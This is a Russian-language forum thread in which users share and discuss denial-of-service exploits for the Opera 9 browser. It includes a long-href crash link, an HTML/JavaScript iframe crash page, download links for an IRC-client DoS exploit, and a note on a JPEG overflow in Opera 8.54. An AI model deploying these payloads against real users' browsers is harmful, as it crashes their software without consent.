Уязвимости: Opera

[Ŧ1LAN]

Opera 9 (long href) Remote Denial of Service Exploit
Описание:
Уязвимость позволяет удаленному пользователю вызвать отказ в обслуживании приложения.

Уязвимость существует при обработке данных в параметре href тега <a>. Удаленный пользователь может с помощью специально сформированной ссылки аварийно завершить работу браузера.
Пример/Эксплоит:

<a href="http://aaaaaaaa...aaa

милворм

Протестить можно здесь:
_http://www.critical.lt/research/opera_die_happy.html

 

[AHTOLLlKA]

проверено на девятке ( релизе )
выпала с крит еррором....
ужаснах!

 

[Ŧ1LAN]

AHTOLLlKA
Ослик, Опера, фаерфокс... кто следующий? =)

 

[not null]

всего лишь DoS...
Касперский палит страницы подобного содержания

 

[Ŧ1LAN]

Ага, палит как Exploit.HTML.Agent.a

 

[AHTOLLlKA]

я вот каспера ваще не переношу..
алень аленем..
мой слабый комп + каспер...
он повиснуть может при открытии блокнота..
имхо др вэб rule the world....
[mod][not null:] Warning! Offtopic detected! Здесь не тема обсуждения предпочтения антивирусного софта[/mod]

ога... сори за офтоп... :cry2:

 

[poisons]

Да.....последняя бетка оперы отвалилась.....Самое интеересное, что и фаерфокс 1.5.0.4 тоже не очень коректо обработал данный баг - попытался подвиснуть.......
Вот блин браузеры для профи гыгыгы. А всеми заблеванный ослик таже не залагнул.

 

[not null]

Переполнение буфера в Opera
Уязвимы: 8.54 и, возможно, более ранние версии
Неуязвимы: 9.0

Целочисленное переполнение буфера при обработке JPEG-изображений позволяет злонамеренному пользователю с помощью специально составленного изображения выполнить произвольный код на целевой системе.

Решение - установить новую версию браузера.

 

[Ŧ1LAN]

Opera Web Browser 9.00 (iframe) Remote Denial of Service Exploit
Эксплоит:

<html>
<iframe src="palsu.php" name="fake"  ></iframe> 
<script type="text/javascript">
function mystyle() {
    if (fake.document.styleSheets.length == 1 ) 
	{
      f = document.forms["basicstyle"].elements;
      for (j = 0; j < f.length; j++) 
    {
        if (f[j].name == 'fsmain');
      	}  
      }

 }
mystyle();
</script>
</html>

проверить можно здесь:
_http://y3dips.echo.or.id/opera9-dos/

 

[not null]

Opera 9 IRC client Remote DoS
удаленный пользователь может вызвать отказ в обслуживании
Эксплоиты:
C version
Скачать|Download
Py version
Скачать|Download

 

[falk]

Вот немного инфы о ней:
Уязвимость существует при обработке данных в параметре href тега . Удаленный пользователь может с помощью специально сформированной ссылки аварийно завершить работу браузера.
«Дыре» присвоен рейтинг опасности «средняя». Для использования уязвимости есть эксплойт. В настоящее время способов устранения уязвимости не существует.

Зато точно (вроде) пофиксена предыдущая дыра, обнаруженная в версиях 8.54 и ранее - когда через специально сформированное jpeg-изображение удалённый злобный пользователь мог выполнить какой угодно произвольный код на машине пользователя (ошибка при обработке jpeg изображений вызывает целочисленное переполнение буфера).

Так что 9-ка рулит однозначно. humbsup: